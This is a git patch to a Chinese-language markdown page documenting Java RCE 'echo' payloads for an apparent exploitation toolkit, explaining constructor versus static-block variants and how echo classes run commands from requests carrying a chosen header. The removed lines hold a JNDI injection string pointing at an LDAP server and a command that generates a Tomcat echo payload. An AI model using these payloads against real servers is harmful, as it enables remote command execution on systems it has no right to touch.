From dcd7b2d2bba7137f50ff7ac9df3e59ef71147eb4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=82=81?= <75202638+qi4L@users.noreply.github.com> Date: Thu, 10 Oct 2024 17:51:16 +0800 Subject: [PATCH] =?UTF-8?q?Updated=204=E3=80=81JAVA=20RCE=20Echo=20(markdo?= =?UTF-8?q?wn)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 4、JAVA-RCE-Echo.md | 15 ++------------- 1 file changed, 2 insertions(+), 13 deletions(-) diff --git a/4、JAVA-RCE-Echo.md b/4、JAVA-RCE-Echo.md index 7141de9..fa305f2 100644 --- a/4、JAVA-RCE-Echo.md +++ b/4、JAVA-RCE-Echo.md @@ -18,22 +18,11 @@ 在回显类前面加大写C即是构造方法实现,反之则在静态代码块中。 加这个的原因是重名类静态代码加载只会执行一次,如果你需要打入一次重复使用就加大写的C。 -例如 `EX-CTomcatEcho` +例如 `EX-CTomcatEcho`。 # 使用说明 -这个功能同时支持 JNDI Injection与恶意类的生成 - -+ JNDIExploit -``` -${jndi:ldap://127.0.0.1:1389/TomcatBypass/M-EX-TomcatEcho} -``` - -+ ysoserial -``` -java -jar JYso-[version].jar -y -g [Gadget] -p "EX-TomcatEcho" -``` - +这个功能同时支持 JNDI Injection与恶意类的生成。 对于 Echo 类的回显,是基于在线程组中找到带有指定 Header 头部的请求、执行命令并回显的利用方式。